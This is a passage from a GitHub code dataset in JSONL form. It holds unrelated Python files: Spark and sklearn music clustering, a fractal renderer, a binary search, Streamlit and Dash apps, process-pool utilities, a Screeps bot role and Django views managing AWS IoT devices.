'w')\n\t\tfp.write(res)\n\t\tfp.close()\n\t\t\n\t\t\n\n","repo_name":"qorelogic/code-challenge_getpayever.com","sub_path":"src/json2yaml.py","file_name":"json2yaml.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1172992031","text":"import os\nimport pickle\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom dfops import *\nfrom conf import *\n\nfrom spark_sklearn import Converter\nfrom pyspark.ml.feature import VectorAssembler\nfrom sklearn.cluster import MeanShift\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import pairwise_distances_argmin_min\nfrom sklearn.externals import joblib\n\n# Returns user pre-pickled library as pandas dataframe, and number of samples in df\ndef load_library(lib_dir):\n with open(lib_dir, 'rb') as f:\n library = pickle.load(f)\n print('loaded')\n num_samples = len(library)\n\n return library, num_samples\n\ndef findmodels():\n temp_bool = True\n for label in matrix_labels:\n if not (os.path.isfile('models/meanshift_' + label + '.model') and os.path.isfile('models/knn_' + label + '.model')):\n temp_bool = False\n\n return temp_bool\n\n# Returns ml_analysis containing numpy matrices depicting analysis data in library['analysis'] column\n# Also returns 3 other spark vector representations of the selected feature dimensions to graph\ndef spark_dfToVectors(main_spark, lib):\n\n lib_analysis = lib['analysis']\n\n # create analysis dataframe\n print(\"Extracting analysis data\")\n start = time.time()\n ml_analysis = refactorAnalysisNP(lib_analysis)\n end = time.time()\n print('Extracted in', (end - start), 'seconds')\n\n # create features dataframe\n s_features = main_spark\n print(\"Extracting feature data\")\n assembler = VectorAssembler(inputCols=s_features.schema.names, outputCol=\"features\")\n v_features = assembler.transform(s_features)\n\n # create technical dataframe\n s_tech = main_spark.select('tempo', 'key', 'loudness', 'valence', 'time_signature', 'liveness', 'energy', 'danceability')\n print(\"Extracting tech data\")\n assembler = VectorAssembler(inputCols=s_tech.schema.names, outputCol=\"tech_features\")\n v_tech = assembler.transform(s_tech)\n\n # create info dataframes\n s_info = main_spark.select('speechiness', 'acousticness', 'instrumentalness')\n print(\"Extracting song info data\")\n assembler = VectorAssembler(inputCols=s_info.schema.names, outputCol=\"info_features\")\n v_info = assembler.transform(s_info)\n\n # create song id dataframes\n s_ids = main_spark.select('name', 'artist', 'album')\n print('Extracting song id info')\n assembler = VectorAssembler(inputCols=s_ids.schema.names, outputCol=\"id_features\")\n v_ids = assembler.transform(s_info)\n\n return ml_analysis, v_features, v_tech, v_info, v_ids\n\ndef separate_dfs(library, ids):\n\n lib_analysis = library['analysis']\n ids = pd.DataFrame(ids, columns=['id'])\n\n lib = library.drop(columns=['track_href', 'uri', 'analysis', 'analysis_url', 'id', 'type'])\n\n #analysis\n analysis_df = refactorAnalysisDF(lib_analysis)\n analysis_df = pd.concat([analysis_df, ids], sort=False)\n\n #main features\n main_df = pd.concat([lib, ids], sort=False)\n\n #technical features\n tech_df = library[['tempo', 'key', 'loudness', 'valence', 'time_signature', 'liveness', 'energy', 'danceability']]\n tech_df = pd.concat([tech_df, ids], sort=False)\n\n #song info\n song_df = lib[['speechiness', 'acousticness', 'instrumentalness']]\n song_df = pd.concat([song_df, ids], sort=False)\n\n #song ids\n songIds_df = lib[['name', 'artist', 'album']]\n songIds_df = pd.concat([songIds_df, ids], sort=False)\n\n return analysis_df, main_df, tech_df, song_df, songIds_df\n\n# Converts all input vectorAssembler-transformed Spark DFs to sklearn processable numpy matrices\ndef vectors_to_matrices(sc, v_features, v_tech, v_info, v_ids):\n print('Converting all vector dataframes to dense matrices')\n start = time.time()\n converter = Converter(sc)\n features, tech, info, ids = converter.toPandas(v_features), converter.toPandas(v_tech), converter.toPandas(v_info), converter.toPandas(v_ids)\n m_features, m_tech, m_info, m_ids = features.values, tech.values, info.values, ids.values\n ml_features, ml_tech, ml_info, ml_ids = normalize_matrix(m_features), normalize_matrix(m_tech), normalize_matrix(m_info), normalize_matrix(m_ids)\n end = time.time()\n print('Converted in', (end - start), 'seconds')\n return ml_features, ml_tech, ml_info, ml_ids\n\ndef load_transform_graphData(song_matrices, matrix_labels):\n\n root_vector_indices = []\n root_neighbors = []\n root_neighbor_weights = []\n\n for f_matrix, m_label in zip(song_matrices, matrix_labels):\n print('loading', m_label, 'model')\n outputfile = 'models/meanshift_' + m_label + '.model'\n clustering = joblib.load(outputfile)\n cluster_centers = clustering.cluster_centers_\n n_clusters = len(cluster_centers)\n\n # Store root vectors\n root_indices = []\n # Returns list of 'labels' corresponding to the song index in the lib array\n for center in cluster_centers:\n roots, _ = pairwise_distances_argmin_min([center], f_matrix)\n root_indices.append(roots)\n\n root_vector_indices.append(root_indices)\n # Given list of roots, perform knn on each one to get neighboring nodes\n for root in root_indices:\n outputfile = 'models/knn_' + m_label + '.model'\n neighbors = joblib.load(outputfile)\n distances, indices = neighbors.kneighbors(f_matrix[root])\n root_neighbors.append(indices)\n root_neighbor_weights.append(distances)\n\n return np.asarray(root_vector_indices), np.asarray(root_neighbors), np.asarray(root_neighbor_weights)\n\ndef fit_transform_graphData(song_matrices, matrix_labels):\n\n root_vector_indices = []\n root_neighbors = []\n root_neighbor_weights = []\n\n for f_matrix, m_label in zip(song_matrices, matrix_labels):\n print(m_label)\n clustering = MeanShift(n_jobs=-1) # init MeanShift clustering model\n outputfile = 'models/meanshift_' + m_label + '.model'\n\n start = time.time()\n # Perform Mean-Shift Clustering\n clustering.fit(f_matrix)\n joblib.dump(clustering, outputfile) # Save MeanShift-clustering model\n\n cluster_centers = clustering.cluster_centers_\n n_clusters = len(cluster_centers)\n end = time.time()\n print('Clustered in', ((end - start) / 60), 'minutes' if ((end - start) > 60) else ((end - start), 'seconds'), 'with ', n_clusters, 'clusters')\n\n # Save root vectors\n root_indices = []\n # returns list of 'labels' corresponding to the song index in the lib array\n for center in cluster_centers:\n roots, _ = pairwise_distances_argmin_min([center], f_matrix)\n root_indices.append(roots)\n\n root_vector_indices.append(root_indices)\n num_samples = f_matrix.shape[0]\n num_neighbors = int((num_samples / 3))\n print('number of neighbors per root:', num_neighbors)\n\n # given list of roots, perform knn on each one to get neighboring nodes\n for root in root_indices:\n neighbors = NearestNeighbors(n_neighbors=num_neighbors, algorithm='auto', n_jobs=-1)\n neighbors.fit(f_matrix)\n\n outputfile = 'models/knn_' + m_label + '.model'\n joblib.dump(neighbors, outputfile) # Save k-Nearest Neighbors model\n\n distances, indices = neighbors.kneighbors(f_matrix[root])\n root_neighbors.append(indices)\n root_neighbor_weights.append(distances)\n\n return np.asarray(root_vector_indices), np.asarray(root_neighbors), np.asarray(root_neighbor_weights)\n\n\ndef checkSavedMatrices():\n temp_bool = False\n\n if os.path.isfile(root_indices_dir) and os.path.isfile(root_neighbors_dir) and os.path.isfile(neighbor_weights_dir):\n temp_bool = True\n\n return temp_bool\n","repo_name":"aymanzay/pyCosmos","sub_path":"schema_functions.py","file_name":"schema_functions.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38038387555","text":"import numpy as np\nfrom PIL import Image, ImageDraw\nimport time\n\nfrom . import api\n\nROOT3 = np.sqrt(3)\n\n\n@api(mode=\"final\")\nclass IFS:\n \"\"\"\n Iterated function system\n \"\"\"\n \n def __init__(self, *maps, dimension=2):\n self.maps = maps\n self.dimension = dimension\n \n def __getitem__(self, item):\n return self.maps[item]\n \n def __call__(self, *points):\n return [tuple(m(point) for point in points)\n for m in self.maps]\n \n def apply(self, *figures):\n \"\"\"\n Apply the map to figures, which consists of a tuple of\n points defining the vertices of a the figure.\n \"\"\"\n return [f for fig in figures for f in self(*fig)]\n \n def iterate(self, figure, iterations):\n \"\"\"\n Apply the IFS iteratively to a figure.\n \"\"\"\n temp = [figure]\n last_time = time.time()\n for i in range(iterations):\n temp = self.apply(*temp)\n print(f\"Applied iteration {i}\",\n f\"in {time.time() - last_time} seconds\",\n f\"({len(temp)} points)\"\n )\n return temp\n \n def __repr__(self):\n return f\"IFS({', '.join(map(lambda m: m.__name__, self.maps))})\"\n \n def render(self, initial_figure, iterations=1, window=(480, 270), file=None):\n \"\"\"\n Render the result of the ifs applied iteratively to an initial\n figure.\n \"\"\"\n figures = self.iterate(initial_figure, iterations)\n \n image = Image.new(\"RGB\", window, \"#ffffff\")\n draw = ImageDraw.Draw(image)\n \n if self.dimension == 1:\n y = window[1] // 2\n sf = window[0]\n for fig in figures:\n pts = list(map(lambda x: (sf * x, y), fig))\n draw.polygon(pts, fill=0)\n elif self.dimension == 2:\n xsf, ysf = window\n for fig in figures:\n pts = list(map(lambda p: (xsf*p[0], ysf*p[1]/ROOT3), fig))\n draw.polygon(pts, fill=\"#000000\")\n else:\n raise RuntimeError(\"Cannot plot higher dimensional fractals\")\n image.transpose(Image.FLIP_TOP_BOTTOM)\n if file is None:\n image.show()\n else:\n image.save(file, \"eps\")\n \n\n@api(mode=\"final\")\ndef cantor_middle_thirds(iterations=2, window=(480, 270), file=None):\n \"\"\"\n Render the Cantor Middle thirds set.\n\n :param iterations:\n :param window:\n :param file:\n :return:\n \"\"\"\n\n def map1(point):\n return point / 3\n \n def map2(point):\n return (point + 2) / 3\n ifs = IFS(map1, map2, dimension=1)\n ifs.render(\n (0.0, 1.0),\n iterations=iterations,\n window=window,\n file=file\n )\n\n\n@api(mode=\"final\")\ndef sierpinski_triangle(iterations=2, window=(480, 270), file=None):\n \"\"\"\n Render the Sierpinski triangle.\n\n :param iterations:\n :param window:\n :param file:\n :return:\n \"\"\"\n def map1(point):\n return point / 2\n \n def map2(point):\n return np.array([point[0] + 1, point[1]]) / 2\n \n def map3(point):\n return np.array([point[0] + 0.5, point[1] + ROOT3]) / 2\n\n ifs = IFS(map1, map2, map3, dimension=2)\n ifs.render(\n (np.array([0.0, 0.0]),\n np.array([1., 0.0]),\n np.array([.5, ROOT3])),\n iterations=iterations,\n window=window,\n file=file\n )\n","repo_name":"karant17/mathematics","sub_path":"mathematics/fractals/ifs.py","file_name":"ifs.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10370809442","text":"import math\n\n\ndef binarysearch(arr, n, k):\n if arr is None:\n return\n\n if len(arr) != n:\n return -1\n\n n = n - 1\n\n # Do a bounds value check. This applies only if the array is sorted\n if k > arr[n] or k < arr[0]:\n return -1\n\n lbound = 0\n ubound = n\n mbound = math.ceil(n / 2)\n\n # def search(arr, search_val, lbound, ubound, mbound):\n # # print(\"Iterate\")\n # if search_val == arr[mbound]:\n # return mbound\n #\n # elif search_val < arr[mbound]:\n # if search_val == arr[lbound]:\n # return lbound\n # elif (mbound - lbound) == 1 and (ubound - mbound) == 1:\n # return -1\n # else:\n # new_lbound = lbound\n # new_ubound = mbound\n # new_mbound = new_lbound + math.ceil((new_ubound - new_lbound) / 2)\n # return search(arr, search_val, lbound=new_lbound, ubound=new_ubound, mbound=new_mbound)\n # elif search_val > arr[mbound]:\n # if search_val == arr[ubound]:\n # return ubound\n # elif (mbound - lbound) == 1 and (ubound - mbound) == 1:\n # return -1\n # else:\n # new_lbound = mbound\n # new_ubound = ubound\n # new_mbound = new_lbound + math.ceil((new_ubound - new_lbound) / 2)\n # return search(arr, search_val, lbound=new_lbound, ubound=new_ubound, mbound=new_mbound)\n\n # def search(arr, search_val, lbound, ubound):\n # # print(\"Iterate\")\n # mbound = lbound + math.ceil((ubound - lbound) / 2)\n #\n # if search_val == arr[mbound]:\n # return mbound\n # # elif (mbound - lbound) <= 1 and (ubound - mbound) <= 1:\n # # return -1\n # elif search_val < arr[mbound]:\n # return search(arr, search_val, lbound, mbound - 1)\n # elif search_val > arr[mbound]:\n # return search(arr, search_val, mbound+1, ubound)\n #\n search_val = k\n counter = 0\n max_val = math.log(n, 2)\n print(\"max iteration\" + str(max_val))\n while counter <= max_val:\n # print(\"Iterate\")\n mbound = lbound + math.ceil((ubound - lbound) / 2)\n\n if search_val == arr[mbound]:\n return mbound\n\n elif search_val < arr[mbound]:\n ubound = mbound - 1\n elif search_val > arr[mbound]:\n lbound = mbound + 1\n\n counter += 1\n\n return -1\n\n\n# arr = [5, 6, 7, 8, 9, 10, 11, 12, 13, 14]\narr = [10, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n# arr = [1, 2, 3, 4, 5, 7]\nprint(binarysearch(arr, len(arr), 20))\n","repo_name":"tecmaverick/pylearn","sub_path":"src/43_algo/37_arr_binary_search.py","file_name":"37_arr_binary_search.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10083280780","text":"import streamlit as st\nimport pandas\nfrom send_email import send_email\n\nst.title(\"Contact Us\")\n\ndf = pandas.read_csv(\"topics.csv\")\n\nwith st.form(key=\"email_form\"):\n user_email = st.text_input(\"Enter your email address\")\n topic = st.selectbox(\"What topic would you like to discuss?\", df['topic'])\n text = st.text_area(\"Your message\")\n message = f\"\"\"\\\nSubject: Message from Best Company Contact Us form\nFrom: {user_email}\n{topic}\n{text}\n\"\"\"\n\n button = st.form_submit_button(\"Submit\")\n if button:\n send_email(message)\n st.info(\"Your email has been sent successfully\")\n","repo_name":"daithileonard/app3-best-company-website","sub_path":"pages/Contact_Us.py","file_name":"Contact_Us.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"172801683","text":"import dash\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\n# instantiate the app\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.DARKLY])\n\n# create app layout\napp.layout = html.Div(children=[\n html.H1(\"Poverty And Equity Database\",\n style={\n \"color\": \"green\",\n \"fontSize\": \"40px\"\n }\n ),\n html.H2(\"The World Bank\"),\n dbc.Tabs([\n dbc.Tab([\n html.Ul([\n html.Li(\"Number of Economies: 170\"), # list items within unordered list block\n html.Li(\"Temporal Coverage: 1974 - 2019\"),\n html.Li(\"Update Frequency: Quarterly\"),\n html.Li([\n \"Source:\",\n html.A('https://datacatalog.worldbank.org/dataset/poverty-and-equity-database',\n href='https://datacatalog.worldbank.org/dataset/poverty-and-equity-database')\n ])\n ])\n ], label=\"Key Facts\"),\n\n dbc.Tab([\n html.Ul([\n html.Br(),\n html.Li(\"Book title: Interactive Dashboards and Data Apps with Plotly and Dash\"),\n html.Li([\n \"Github repo:\",\n html.A('https://github.com/PacktPublishing/Interactive-Dashboards-and-Data-Apps-with-Plotly-and-Dash',\n href='https://github.com/PacktPublishing/Interactive-Dashboards-and-Data-Apps-with-Plotly-and-Dash')])\n ])\n ], label=\"Project Info\")\n ])\n])\n\n# run app\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","repo_name":"hamemuh/plotly-dash","sub_path":"1 - Dash Overview/tabs.py","file_name":"tabs.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72116221920","text":"def add_time(start, duration, day=\"None\"):\n days = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n start = start.split(\" \")\n hour = int(start[0].split(\":\")[0])\n minute = int(start[0].split(\":\")[1])\n dhour = int(duration.split(\":\")[0])\n dminute = int(duration.split(\":\")[1])\n\n minute = minute + dminute\n hour = hour + dhour + (minute // 60)\n minute = minute % 60\n\n dhour = hour // 12\n hour = hour % 12\n\n\n if minute<10:\n minute = str(minute)\n minute = minute.zfill(2)\n dhour = (\"PM\" == start[1].strip()) + dhour\n\n if hour == 0:\n hour = 12 \n\n new_time = f\"{hour}:{minute} {'AM' * (dhour % 2 == 0) + 'PM' * (dhour % 2 == 1)}\"\n if day != \"None\":\n new_time = new_time + \", \"+days[(days.index(day.strip().capitalize())+dhour//2)%7]\n\n if dhour//2 >1:\n new_time = new_time + f\" ({dhour // 2} days later)\"\n elif dhour//2 ==1:\n new_time = new_time + \" (next day)\"\n\n return new_time","repo_name":"LuisEmanuelDias/FreeCodeCamp","sub_path":"boilerplate-time-calculator-2/time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42991705136","text":"# This file is part of Pebble.\n\n# Pebble is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License\n# as published by the Free Software Foundation,\n# either version 3 of the License, or (at your option) any later version.\n\n# Pebble is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n\n# You should have received a copy of the GNU Lesser General Public License\n# along with Pebble. If not, see .\n\nimport os\nimport sys\n\nfrom select import select\nfrom functools import wraps\nfrom traceback import format_exc\ntry: # Python 2\n from cPickle import PicklingError\nexcept: # Python 3\n from pickle import PicklingError\nif os.name in ('posix', 'os2'):\n from signal import SIGKILL\n\nfrom pebble.exceptions import TimeoutError, ProcessExpired\n\n\n_registered_functions = {}\n\n\ndef stop(worker):\n \"\"\"Does its best to stop the worker.\"\"\"\n worker.terminate()\n worker.join(3)\n\n if worker.is_alive() and os.name != 'nt':\n try:\n os.kill(worker.pid, SIGKILL)\n worker.join()\n except OSError:\n return\n\n if worker.is_alive():\n raise RuntimeError(\"Unable to terminate PID %d\" % os.getpid())\n\n\ndef get_results(pipe, timeout):\n \"\"\"Waits for results and handles communication errors.\"\"\"\n try:\n if poll(pipe, timeout):\n return pipe.recv()\n else:\n return TimeoutError('Task Timeout', timeout)\n except (EnvironmentError, EOFError):\n return ProcessExpired('Abnormal termination')\n except Exception as error:\n return error\n\n\ndef poll(pipe, timeout):\n \"\"\"Python's Pipe.poll blocks undefinitely if data is too big.\"\"\"\n if os.name != 'nt':\n return select([pipe], [], [], timeout)[0] and True or False\n else:\n return pipe.poll(timeout)\n\n\ndef send_results(pipe, data):\n \"\"\"Send results and handles communication errors.\"\"\"\n try:\n pipe.send(data)\n except PicklingError as error:\n error.traceback = format_exc()\n pipe.send(error)\n\n\ndef decorate(function, launcher, **properties):\n \"\"\"Decorates the given function\n taking care of Windows process decoration issues.\n\n *function* represent the target function to be decorated,\n *launcher* takes care of executing the function with the\n given decoration *properties*.\n\n \"\"\"\n if os.name == 'nt':\n register_function(function)\n\n @wraps(function)\n def wrapper(*args, **kwargs):\n if os.name == 'nt':\n target, args = dump_function(function, args)\n else:\n target = function\n\n return launcher(target, args=args, kwargs=kwargs, **properties)\n\n return wrapper\n\n\ndef register_function(function):\n global _registered_functions\n\n _registered_functions[function.__name__] = function\n\n\ndef dump_function(function, args):\n \"\"\"Dumps a decorated function.\"\"\"\n args = [function.__name__, function.__module__] + list(args)\n\n return trampoline, args\n\n\ndef trampoline(name, module, *args, **kwargs):\n \"\"\"Trampoline function for decorators.\n\n Lookups the function between the registered ones;\n if not found, forces its registering and then executes it.\n\n \"\"\"\n function = function_lookup(name, module)\n return function(*args, **kwargs)\n\n\ndef function_lookup(name, module):\n \"\"\"Searches the function between the registered ones.\n If not found, it imports the module forcing its registration.\n\n \"\"\"\n try:\n return _registered_functions[name]\n except KeyError: # force function registering\n __import__(module)\n mod = sys.modules[module]\n getattr(mod, name)\n\n return _registered_functions[name]\n","repo_name":"Alidron/demo-nao","sub_path":"alidron-env/lib/python2.7/site-packages/pebble/process/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14987774862","text":"from typing import List \n\ndef productExceptSelf(nums: List[int]) -> List[int]:\n n = len(nums)\n result = [1 for _ in range(n)]\n for i in range(1, n):\n result[i] = result[i - 1] * nums[i - 1]\n factor = 1\n for i in range(-1, -n - 1, -1):\n result[i] *= factor \n factor *= nums[i]\n return result ","repo_name":"qj/lc","sub_path":"238.py","file_name":"238.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12649258395","text":"import pandas as pd\r\nimport numpy as np\r\nfrom pandas import Series,DataFrame\r\n\r\nfrom io import StringIO\r\n\r\ndata=\"\"\"\\\r\nSample Animal Intelligence\r\n1 Dog Smart\r\n2 Dog Smart\r\n3 Cat Dumb\r\n4 Cat Dumb\r\n5 Dog Dumb\r\n6 Cat Smart\"\"\"\r\n\r\ndframe=pd.read_table(StringIO(data),sep=\"\\s+\")\r\n\r\nprint(dframe)\r\nprint(\"=\"*50)\r\n\r\n\r\npd.crosstab(dframe.Animal,dframe.Intelligence,margins=True)\r\n","repo_name":"brandle26/Learning","sub_path":"Section 7 - Wokrking with data part 3/Lec 46 - Cross Tabulation/Cross_Tabulation.py","file_name":"Cross_Tabulation.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14200694380","text":"from defs import *\nfrom base_creep import BaseCreep\n\n__pragma__('noalias', 'name')\n__pragma__('noalias', 'undefined')\n__pragma__('noalias', 'Infinity')\n__pragma__('noalias', 'keys')\n__pragma__('noalias', 'get')\n__pragma__('noalias', 'set')\n__pragma__('noalias', 'type')\n__pragma__('noalias', 'update')\n\n\nclass Upgrader(BaseCreep):\n def __init__(self, creep):\n super().__init__(creep)\n\n def run_upgrader(self):\n \"\"\"\n Runs a creep as a generic harvester.\n :param creep: The creep to run\n \"\"\"\n self.set_filling()\n if self.creep.memory.filling:\n # If we have a source use it\n if self.creep.memory.source:\n source = Game.getObjectById(self.creep.memory.source)\n if not source:\n del self.creep.memory.source\n else:\n # Get location of the closest container or dropped resources.\n source = self.get_source(\"container\")\n if source:\n self.creep.memory.source = source.id\n else:\n source = self.get_source(\"dropped\")\n if source:\n self.creep.memory.source = source.id\n\n # If we're near the source, harvest it - otherwise, move to it.\n if self.creep.pos.isNearTo(source):\n self.collect_source(source)\n # result = self.creep.withdraw(source, RESOURCE_ENERGY)\n # if result != 0:\n # self.creep.pickup(source)\n else:\n self.creep.moveTo(source)\n else:\n # If we have a saved target, use it\n if self.creep.memory.target:\n target = Game.getObjectById(self.creep.memory.target)\n else:\n target = self.get_target(\"controller\")\n if target:\n self.creep.memory.target = target.id\n\n # If we are targeting a spawn or extension, we need to be directly next to it - otherwise, we can be 3 away.\n is_close = self.creep.pos.inRangeTo(target, 3)\n\n if is_close:\n # If we are targeting a spawn or extension, transfer energy. Otherwise, use upgradeController on it.\n result = self.creep.upgradeController(target)\n if result != OK:\n print(\"[{}] Unknown result from creep.upgradeController({}): {}\".format(\n self.creep.name, target, result))\n # Let the creeps get a little closer than required to the controller, to make room for other creeps.\n # if not self.creep.pos.inRangeTo(target, 2):\n # self.creep.moveTo(target)\n else:\n self.creep.moveTo(target)\n","repo_name":"stove41/screeps","sub_path":"src/upgrader.py","file_name":"upgrader.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28197608978","text":"# Gabriel Diniz Gisoldo RA: 22214007-1\nclass AnalisadorSintatico(object):\n \"\"\"Analisador sintatico.\"\"\"\n\n def __init__(self, string, idx=0):\n self.string = string\n self.idx = idx\n self.pilha = 0\n\n def print_log(self):\n \"\"\".\"\"\"\n print(vars(self))\n\n def up_index(self):\n \"\"\".\"\"\"\n self.idx += 1\n\n def eh_simbolo(self):\n \"\"\".\"\"\"\n return self.string[self.idx] in ['+', '-', '*', '/', '=']\n\n def fim_string(self):\n \"\"\".\"\"\"\n return self.idx == len(self.string)\n\n def rejeita(self):\n \"\"\".\"\"\"\n raise Exception('REJEITA')\n\n def start(self):\n \"\"\".\"\"\"\n self.e0()\n\n def e0(self):\n \"\"\".\"\"\"\n # self.print_log()\n if self.fim_string():\n self.rejeita()\n elif self.string[self.idx] == 'N':\n self.up_index()\n self.e1()\n elif self.string[self.idx] == 'I':\n self.up_index()\n self.e1()\n elif self.string[self.idx] == '(':\n self.up_index()\n self.e2()\n else:\n self.rejeita()\n\n def e1(self):\n \"\"\".\"\"\"\n # self.print_log()\n if self.pilha == 0:\n if self.fim_string():\n print(\"ACEITO\")\n elif self.eh_simbolo():\n self.up_index()\n self.e0()\n else:\n self.rejeita()\n else:\n if self.fim_string():\n self.rejeita()\n elif self.eh_simbolo():\n self.up_index()\n self.e0()\n elif self.string[self.idx] == ')':\n return\n else:\n self.rejeita()\n\n def e2(self):\n \"\"\".\"\"\"\n # self.print_log()\n if self.fim_string():\n self.rejeita()\n else:\n self.pilha += 1\n self.e0()\n self.pilha -= 1\n self.e3()\n\n def e3(self):\n \"\"\".\"\"\"\n if self.fim_string():\n self.rejeita()\n elif self.string[self.idx] == ')':\n self.up_index()\n self.e1()\n else:\n self.rejeita()\n","repo_name":"huine/compiladores","sub_path":"analisador_sintatico.py","file_name":"analisador_sintatico.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23485406851","text":"from datetime import datetime\nimport hashlib\nimport json\nimport os\n\nimport boto3\n\nimport env_vars\n\nfrom django.shortcuts import render, redirect, reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import auth\nfrom django.forms.models import model_to_dict\nfrom django.contrib import messages\n\nfrom things.models import Thing, ThingRule\nfrom dashboard.models import Record\n\nfrom .aws_iot import (list_things, create_thing, create_credentials,\n create_policy, attach_policy, create_thing_name,\n delete_policy, delete_certificate, deactivate_certificate,\n delete_iot_thing, create_iot_rule)\n\nfrom .helper import add_to_zip, delete_from_s3\n\nACCESS_KEY = os.environ.get('S3_ACCESS_KEY', 'No value set')\nSECRET_KEY = os.environ.get('S3_SECRET_KEY', 'No value set')\n\n@login_required(redirect_field_name=None, login_url='/')\ndef things(request):\n things = Thing.objects.filter(user=request.user).all()\n rules_set = {}\n for thing in things:\n rules_set.setdefault(thing.thing_name, [])\n for rule in thing.rules.all().values():\n rules_set[thing.thing_name].append(rule)\n print(rules_set)\n return render(request, 'things.html', {'things': things.values(), 'rules': rules_set})\n\n\n@login_required(redirect_field_name=None, login_url='/')\ndef add_thing(request):\n things = Thing.objects.all().filter(user=request.user)\n if things.count() > 4:\n messages.error(request, 'You already have four things, please delete or updgrade your account.')\n return redirect(reverse('things_index'))\n\n display_name = request.POST.get('display_name')\n if not display_name:\n return redirect(reverse('things_index'))\n #try:\n thing_name = create_thing_name(display_name)\n thing = json.loads(create_thing(thing_name))\n policy = json.loads(create_policy(thing_name))\n credentials = json.loads(create_credentials())\n #credentials = {'certificatePem':'', 'keyPair': {'PrivateKey': ''}}\n zip_file_url = add_to_zip(credentials, thing_name, request.user.username)\n attached_policy = attach_policy(policy.get('policyName'), \n credentials.get('certificateArn'))\n thing = Thing.objects.create(\n display_name=display_name,\n thing_name=thing_name,\n user=request.user,\n policy_name=policy.get('policyName'),\n certificate_arn=credentials.get('certificateArn'),\n credentials_url=zip_file_url\n )\n return redirect(reverse('things_index'))\n\n\n@login_required(redirect_field_name=None, login_url='/')\ndef delete_thing(request):\n print(request.POST.get('thing_id'))\n thing = Thing.objects.get(thing_name=request.POST.get('thing_id'))\n print(1)\n deactivated_certificate = deactivate_certificate(thing.certificate_arn)\n print(2.1)\n deleted_certificate = delete_certificate(thing.certificate_arn)\n print(2.2)\n deleted_policy = delete_policy(thing.policy_name)\n print(3)\n deleted_thing = delete_iot_thing(thing.thing_name)\n print(4)\n deleted_s3_file = delete_from_s3(thing.thing_name)\n print(5)\n thing.delete()\n messages.success(request, 'Thing deleted successfully.')\n return redirect(reverse('things_index'))\n\n\n@login_required(redirect_field_name=None, login_url='/')\ndef add_topic_rule(request):\n context = \"\"\n thing_name = request.POST.get('thing_id')\n print(thing_name)\n rule_action = request.POST.get('rule_action')\n measure = request.POST.get('rule_measure')\n operator = request.POST.get('rule_operator')\n val = request.POST.get('rule_value')\n rule_params = \"%s %s %s\" % (measure, operator, val)\n thing = Thing.objects.get(thing_name=request.POST.get('thing_id'))\n rules = thing.rules.all()\n print(rules)\n rule_num = rules.count()+1\n\n if rule_num < 4:\n topic_rule = create_iot_rule(thing_name, rule_action, rule_params, str(rule_num)) \n rule = ThingRule.objects.create(thing=thing, rule=rule_params, action=rule_action)\n thing.rules.add(rule)\n else:\n messages.error(request, \"You alreay have 3 topic rules. Please upgrade your subscription or delete some of your rules to add a new rule.\")\n\n return redirect(reverse('things_index'))\n\n@login_required(redirect_field_name=None, login_url='/')\ndef change_status(request):\n thing_name = request.POST.get('thing_id')\n thing = Thing.objects.get(thing_name=thing_name)\n\n client = boto3.client('iot-data', region_name='eu-west-1', \n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY)\n \n payload = {\n \"state\" : {\n \"desired\" : {\n 'type':'listen',\n 'publishing': (not thing.turned_on)\n },\n \"reported\" : {\n 'type':'listen',\n 'publishing': (not thing.turned_on)\n }\n }\n }\n\n \n response = client.publish(\n topic='$aws/things/%s/shadow/update/accepted' % thing_name,\n qos=1,\n payload=json.dumps(payload)\n )\n thing.turned_on = (not thing.turned_on)\n thing.save()\n return redirect(reverse('things_index'))\n","repo_name":"stefdworschak/iot_plant_irrigation","sub_path":"iot_irrigation/things/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11694378213","text":"import example_pb2\nimport example_pb2_grpc\nimport ast\nfrom concurrent import futures\nimport os\nimport 